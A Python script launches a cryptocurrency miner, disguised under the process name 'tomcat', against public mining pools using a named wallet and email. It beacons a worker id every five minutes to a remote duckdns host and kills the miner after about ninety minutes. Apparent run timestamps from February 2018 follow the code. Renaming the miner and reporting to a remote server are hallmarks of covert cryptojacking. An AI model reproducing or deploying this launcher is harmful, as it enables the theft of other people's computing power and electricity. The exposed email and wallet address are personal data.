import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:34:01.641741
#2018-02-17 17:22:06.042984
#2018-02-17 19:11:06.024918
#2018-02-17 20:59:03.447188
#2018-02-17 22:45:03.349611
#2018-02-18 00:27:06.423058
#2018-02-18 02:18:04.208990
#2018-02-18 04:06:04.675441
#2018-02-18 05:56:01.526401
#2018-02-18 07:46:07.290915
#2018-02-18 09:34:06.979401
#2018-02-18 11:20:05.863362
#2018-02-18 13:06:07.938328
#2018-02-18 14:57:03.328051
#2018-02-18 16:46:05.561989
#2018-02-18 18:34:06.503041
#2018-02-18 20:22:07.080132
#2018-02-18 22:08:07.887884
#2018-02-18 23:56:02.192919
#2018-02-19 01:42:06.093244
#2018-02-19 03:30:08.090577
#2018-02-19 05:14:05.469141
#2018-02-19 06:59:06.622233
#2018-02-19 08:48:06.552439
#2018-02-19 10:38:06.212262
#2018-02-19 12:25:06.320474
#2018-02-19 14:12:01.429343
#2018-02-19 16:02:01.744323
#2018-02-19 17:49:04.857599
#2018-02-19 19:36:06.936866
#2018-02-19 21:25:05.750428
#2018-02-19 23:10:04.213355
#2018-02-20 00:56:09.280364
#2018-02-20 02:47:05.573754
#2018-02-20 04:35:09.249697
#2018-02-20 06:19:04.157730
#2018-02-20 08:04:07.663272
#2018-02-20 09:50:08.181053
#2018-02-20 11:34:05.688658
#2018-02-20 13:21:04.526798
#2018-02-20 15:07:07.174685
#2018-02-20 16:53:09.485508
#2018-02-20 18:43:02.120899
#2018-02-20 20:34:06.314659
#2018-02-20 22:20:07.817848
#2018-02-21 00:01:08.834105
#2018-02-21 01:46:07.395128
#2018-02-21 03:36:04.332890
#2018-02-21 05:24:07.753722
#2018-02-21 07:12:05.235473
#2018-02-21 08:57:01.572183
#2018-02-21 10:44:08.200538
#2018-02-21 12:31:06.555808
#2018-02-21 15:12:09.353579
#2018-02-21 17:02:09.060444
#2018-02-21 18:49:10.693724
#2018-02-21 20:31:07.931496
#2018-02-21 22:19:06.095946
#2018-02-22 00:08:06.440768
#2018-02-22 01:57:07.436230
#2018-02-22 03:44:08.433190
#2018-02-22 05:31:05.639011
#2018-02-22 07:16:05.785937
#2018-02-22 09:04:01.660379
#2018-02-22 10:52:05.607891
#2018-02-22 12:39:11.338444
#2018-02-22 14:26:07.833281
#2018-02-22 16:12:09.400704
#2018-02-22 17:59:11.606348
#2018-02-22 19:48:09.403605
#2018-02-22 21:38:07.914578
#2018-02-22 23:25:06.494938
#2018-02-23 01:12:05.166622
#2018-02-23 02:57:07.682672
#2018-02-23 04:43:07.910147
#2018-02-23 06:29:07.790109
#2018-02-23 08:17:05.597863
#2018-02-23 10:34:02.172038
#2018-02-23 12:28:07.999360
#2018-02-23 14:17:07.629075
#2018-02-23 16:09:09.379978
#2018-02-23 17:55:04.921405
#2018-02-23 19:42:08.560197
#2018-02-23 21:25:07.044679
#2018-02-23 23:13:05.200777
#2018-02-24 00:57:05.450647
#2018-02-24 02:52:05.630787
#2018-02-24 05:28:06.779242
#2018-02-24 07:14:07.080900
#2018-02-24 09:04:01.672188
#2018-02-24 11:03:01.693706
#2018-02-24 12:52:01.944416
#2018-02-24 14:40:06.440548
#2018-02-24 16:31:07.837206
#2018-02-24 18:21:05.343926
#2018-02-24 20:08:03.889995
#2018-02-24 21:52:06.366217
#2018-02-25 00:53:04.997721
#2018-02-25 04:41:06.648418
#2018-02-25 08:36:01.344516